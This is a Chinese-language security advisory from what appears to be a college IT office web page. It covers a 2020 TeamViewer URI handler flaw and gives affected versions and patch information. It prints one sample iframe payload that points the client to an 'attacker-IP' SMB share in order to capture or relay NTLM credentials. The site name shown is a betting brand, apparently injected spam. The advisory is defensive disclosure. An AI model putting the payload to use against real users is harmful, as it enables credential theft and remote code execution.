williamhill官网

今天是:
设为首页  |  加入收藏
信息化建设办公室
网站首页|部门简介|工作动态|通知公告|招标公告|网络安全|规章制度|常见问题|党建工作|资料下载
关于Microsoft HTTP.sys ... 06-05
关于Adobe发布更新修复产... 03-24
关于Python官方紧急修复... 02-28
关于TeamViewer远程代码... 09-15
关于WebLogic Server高危... 07-20
更多>> 
请输入要搜索信息的内容!

办公地点:信科楼203
办公电话:(023)58802817
办公邮箱:xxb@cqsxzy.edu.cn

 
安全公告
关于TeamViewer远程代码执行漏洞的安全公告
2020-09-15 12:21   审核人:

一、情况分析

TeamViewer是由德国TeamViewer公司开发的一款用于远程控制、桌面共享的软件,可用于Windows,macOS,Linux等多种操作系统,是目前国内外应用最为广泛的远程访问程序之一。

近日,TeamViewer官方发布了TeamViewer URL处理的风险通告,TeamViewer存在未引用的搜索路径或元素的安全缺陷,攻击者不需要进行身份验证即可获取访问权限。

漏洞原理

TeamViewer存在未引用的搜索路径或元素的安全缺陷,由于应用程序没有正确引用其自定义URI处理程序,导致程序将参数视为系统命令而不是值。攻击者可以使用特制的URL(iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs')将恶意iframe嵌入恶意网站中,当安装了受影响TeamViewer软件的系统访问恶意网页时,使得用户WEB浏览器中加载该iframe,从而启动TeamViewer Windows桌面客户端程序并强制其打开远程SMB共享。

Windows将在打开SMB共享时,执行NTLM身份验证,并且可以转发该请求(使用如响应程序之类的工具)以执行代码(或捕获该请求以进行哈希破解)。

该漏洞的利用可以远程启动,并且由于是受害者的计算机发起与攻击者的SMB共享连接,因此攻击者不需要进行身份验证即可获取访问权限。

二、影响范围

TeamViewer < 8.0.258861

TeamViewer < 9.0.28860

TeamViewer < 10.0.258873

TeamViewer < 11.0.258870

TeamViewer < 12.0.258869

TeamViewer < 13.2.36220

TeamViewer < 14.2.56676

TeamViewer < 15.8.3

三、处置建议

目前厂商已发布补丁,版本8.0.258861、9.0.258860、10.0.258873、11.0.258870、12.0.258869、13.2.36220、14.2.56676、14.7.48350和15.8.3中已修复,不受此漏洞影响。




关闭窗口
 
 
 

Copyright@2020 版权所有:williamhill官网  网络安全信息中心  渝ICP备05013922-1号